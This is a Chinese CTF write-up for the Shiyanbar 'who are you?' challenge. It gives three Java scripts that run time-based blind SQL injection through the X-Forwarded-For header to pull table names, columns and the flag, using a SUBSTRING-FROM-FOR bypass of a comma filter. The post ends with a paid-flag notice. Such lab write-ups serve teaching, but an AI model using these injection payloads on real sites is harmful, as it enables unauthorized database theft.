1.题目说记录到db,又和ip有关,那么一般是xff头了

2.尝试报错注入发现没回显,于是使用bp试一下盲注

西普CTF-who are you?-以夕阳落款

发现确实延时了3秒

3.把这个包拿到sqlmap来跑一下竟然没跑出来,想一下可能有过滤,最终尝试发现过滤了 ,

4.尝试自己写个脚本(java版 httpclient 4.5)

4.1获取表

public static void getTable() throws ClientProtocolException, IOException
{
	String table="";
	for(int m=1;m<20;m++)
	for (int i = 32; i < 127; i++)
	{
		long t1 = System.currentTimeMillis();
		HttpClient client = HttpClients.createDefault();

		String url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php";

		HttpGet get = new HttpGet(url);
		get.addHeader("X-Forwarded-For"," aa' or (SELECT CASE WHEN"
				+ " ( Ascii( SUBSTRING((select group_concat(table_name) from information_schema.tables where table_schema=database()) FROM "+ m +" FOR 1))="+i+")"
				+ " THEN SLEEP(4) ELSE SLEEP(0) END )  and 'a'='a");

		CloseableHttpResponse response = (CloseableHttpResponse) client.execute(get);

		HttpEntity enity = response.getEntity();

		String body = EntityUtils.toString(enity, "UTF-8");

		long t2 = System.currentTimeMillis();
		//System.out.println(body);
		System.out.println((t2 - t1)+"s,i="+i+"   "+table);
		if((t2-t1)>4000)
		{
			table=table+(char)i;
			System.out.println(table);
			break;
		}	
	}
}  
西普CTF-who are you?-以夕阳落款

发现有 cilent_ip和flag两个表

4.2获取列

public static void getcolumn() throws ClientProtocolException, IOException
{
	
	String database="";
	for(int m=1;m<20;m++)
	for (int i = 32; i < 127; i++)
	{
		long t1 = System.currentTimeMillis();
		HttpClient client = HttpClients.createDefault();

		String url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php";

		HttpGet get = new HttpGet(url);
		get.addHeader("X-Forwarded-For"," aa' or (SELECT CASE WHEN"
				+ " ( Ascii( SUBSTRING((select group_concat(column_name) from information_schema.columns where table_name='flag') FROM "+ m +" FOR 1))="+i+")"
				+ " THEN SLEEP(5) ELSE SLEEP(0) END )  and 'a'='a");

		CloseableHttpResponse response = (CloseableHttpResponse) client.execute(get);

		HttpEntity enity = response.getEntity();

		String body = EntityUtils.toString(enity, "UTF-8");

		long t2 = System.currentTimeMillis();
		//System.out.println(body);
		System.out.println((t2 - t1)+"s,i="+i+"   "+database);
		if((t2-t1)>5000)
		{
			database=database+(char)i;
			System.out.println(database);
			break;
		}
		
	}
}
西普CTF-who are you?-以夕阳落款

跑出flag这个列

4.3 跑flag

public static void getflag() throws ParseException, IOException
{
	String database="";
	for(int m=1;m<50;m++)
	for (int i = 32; i < 127; i++)
	{
		long t1 = System.currentTimeMillis();
		HttpClient client = HttpClients.createDefault();

		String url = "http://ctf5.shiyanbar.com/web/wonderkun/index.php";

		HttpGet get = new HttpGet(url);
		get.addHeader("X-Forwarded-For"," aa' or (SELECT CASE WHEN"
				+ " ( Ascii( SUBSTRING((select flag from flag) FROM "+ m +" FOR 1))="+i+")"
				+ " THEN SLEEP(6) ELSE SLEEP(0) END )  and 'a'='a");

		CloseableHttpResponse response = (CloseableHttpResponse) client.execute(get);

		HttpEntity enity = response.getEntity();

		String body = EntityUtils.toString(enity, "UTF-8");

		long t2 = System.currentTimeMillis();
		//System.out.println(body);
		System.out.println((t2 - t1)+"s,i="+i+"   "+database);
		if((t2-t1)>6000)
		{
			database=database+(char)i;
			System.out.println(database);
			break;
		}
		
	}
}

一共32位 跑出flag

(因为网络问题,sleep越长越精确,注入要用or 用and不行)

西普CTF-who are you?-以夕阳落款

Flag:

温馨提示: 此处内容需要评论本文后刷新才能查看,支付2元即可直接查看所有Flag。

小广告:关于获取西普实验吧所有Flag请点击这里查看索引

查看所有Flag文章需要输入密码,需要获取文章密码的童鞋请扫描下面微信或支付宝二维码捐助至少2元(老哥,捐多捐少是个缘分)之后发送支付凭证号联系我获取,Flag大全地址:Flag大全

新功能:捐款的小伙伴请联系我把自己的注册邮箱加入网站白名单,可以免回复看到本站所有Flag

PS:本站不是实验吧的官方站点,纯粹是个人博客,收取Flag费用仅是维持服务器费用,做站不易,且行窃珍惜!

微信二维码:
支付宝二维码: